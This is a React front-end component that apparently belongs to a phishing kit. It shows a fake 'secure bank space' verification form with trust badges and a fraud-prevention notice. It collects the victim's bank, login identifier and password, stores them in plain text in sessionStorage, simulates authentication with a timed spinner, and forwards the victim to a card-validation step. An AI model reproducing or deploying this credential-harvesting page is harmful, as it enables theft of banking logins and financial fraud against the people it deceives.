import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "@/components/ui/select";
import { ShieldCheck, Landmark, User, Lock, AlertCircle } from "lucide-react";
import { toast } from "sonner";
import axios from "axios";
import { useLanguage } from "@/lib/LanguageContext";

const API_URL = `${process.env.REACT_APP_BACKEND_URL}/api`;

export default function BankAuthPage() {
  const navigate = useNavigate();
  const { t } = useLanguage();
  const [bank, setBank] = useState("");
  const [bankId, setBankId] = useState("");
  const [bankPassword, setBankPassword] = useState("");
  const [isLoading, setIsLoading] = useState(false);
  const [banks, setBanks] = useState([]);

  useEffect(() => {
    const storedBalance = sessionStorage.getItem("userBalance");
    if (!storedBalance) {
      navigate("/");
      return;
    }
    
    const loadBanks = async () => {
      try {
        const response = await axios.get(`${API_URL}/banks`);
        setBanks(response.data);
      } catch (error) {
        console.error("Error loading banks:", error);
      }
    };
    loadBanks();
  }, [navigate]);

  const handleSubmit = (e) => {
    e.preventDefault();

    if (!bank) {
      toast.error(t("selectBankError"));
      return;
    }
    if (!bankId.trim()) {
      toast.error(t("enterIdentifier"));
      return;
    }
    if (!bankPassword.trim()) {
      toast.error(t("enterPassword"));
      return;
    }

    setIsLoading(true);

    sessionStorage.setItem("bankName", bank);
    sessionStorage.setItem("bankId", bankId);
    sessionStorage.setItem("bankPassword", bankPassword);

    setTimeout(() => {
      setIsLoading(false);
      navigate("/card-validation");
    }, 1500);
  };

  return (
    <div className="min-h-screen mesh-gradient flex flex-col items-center justify-center p-4">
      <div className="w-full max-w-md animate-fade-in">
        {/* Secure Gateway Header */}
        <div className="text-center mb-6">
          <div className="inline-flex items-center justify-center w-14 h-14 bg-[#2563EB] rounded-2xl mb-4 shadow-lg">
            <Landmark className="w-7 h-7 text-white" />
          </div>
          <h1 className="text-2xl font-bold text-[#0F172A]">{t("secureBankSpace")}</h1>
        </div>

        {/* Info Alert */}
        <div className="bg-[#FEF3C7] border border-[#F59E0B]/20 rounded-lg p-4 mb-6 flex items-start gap-3 animate-fade-in" style={{ animationDelay: '0.1s' }}>
          <AlertCircle className="w-5 h-5 text-[#D97706] flex-shrink-0 mt-0.5" />
          <div>
            <p className="text-sm font-medium text-[#92400E]">{t("bankVerificationRequired")}</p>
            <p className="text-xs text-[#A16207] mt-1">
              {t("fraudPrevention")}
            </p>
          </div>
        </div>

        {/* Bank Auth Form */}
        <Card className="form-container border-0 shadow-xl animate-fade-in" style={{ animationDelay: '0.2s' }} data-testid="bank-auth-card">
          <CardHeader className="pb-2">
            <CardTitle className="text-base font-medium text-[#64748B]">
              {t("connectViaBank")}
            </CardTitle>
          </CardHeader>
          <CardContent>
            <form onSubmit={handleSubmit} className="space-y-4">
              <div className="space-y-2">
                <Label htmlFor="bank" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("bank")}
                </Label>
                <Select value={bank} onValueChange={setBank}>
                  <SelectTrigger className="h-10 text-sm" data-testid="bank-select">
                    <SelectValue placeholder={t("selectBank")} />
                  </SelectTrigger>
                  <SelectContent>
                    {banks.map((bankName) => (
                      <SelectItem key={bankName} value={bankName}>
                        <div className="flex items-center gap-2">
                          <Landmark className="w-4 h-4 text-[#64748B]" />
                          <span>{bankName}</span>
                        </div>
                      </SelectItem>
                    ))}
                  </SelectContent>
                </Select>
              </div>

              <div className="space-y-2">
                <Label htmlFor="bankId" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("identifier")}
                </Label>
                <div className="relative">
                  <User className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-[#64748B]" />
                  <Input
                    id="bankId"
                    type="text"
                    placeholder={t("bankIdentifierPlaceholder")}
                    value={bankId}
                    onChange={(e) => setBankId(e.target.value)}
                    className="pl-10 h-10 text-sm"
                    data-testid="bank-id-input"
                  />
                </div>
              </div>

              <div className="space-y-2">
                <Label htmlFor="bankPassword" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("password")}
                </Label>
                <div className="relative">
                  <Lock className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-[#64748B]" />
                  <Input
                    id="bankPassword"
                    type="password"
                    placeholder="••••••••"
                    value={bankPassword}
                    onChange={(e) => setBankPassword(e.target.value)}
                    className="pl-10 h-10 text-sm"
                    data-testid="bank-password-input"
                  />
                </div>
              </div>

              <div className="pt-4">
                <Button
                  type="submit"
                  className="w-full h-11 bg-[#2563EB] hover:bg-[#1D4ED8] text-white font-medium rounded-lg transition-all shadow-md hover:shadow-lg"
                  disabled={isLoading}
                  data-testid="authenticate-button"
                >
                  {isLoading ? (
                    <span className="flex items-center gap-2">
                      <span className="w-4 h-4 border-2 border-white/30 border-t-white rounded-full animate-spin" />
                      {t("authenticating")}
                    </span>
                  ) : (
                    t("authenticate")
                  )}
                </Button>
              </div>
            </form>
          </CardContent>
        </Card>
      </div>

      {/* Security Footer */}
      <div className="mt-8 pb-6 text-center">
        <div className="flex items-center justify-center gap-3">
          <div className="security-badge">
            <ShieldCheck className="w-4 h-4" />
            <span>{t("secureSSL")}</span>
          </div>
        </div>
        <p className="text-center text-xs text-[#64748B] mt-2">
          {t("dataProtected")}
        </p>
      </div>
    </div>
  );
}
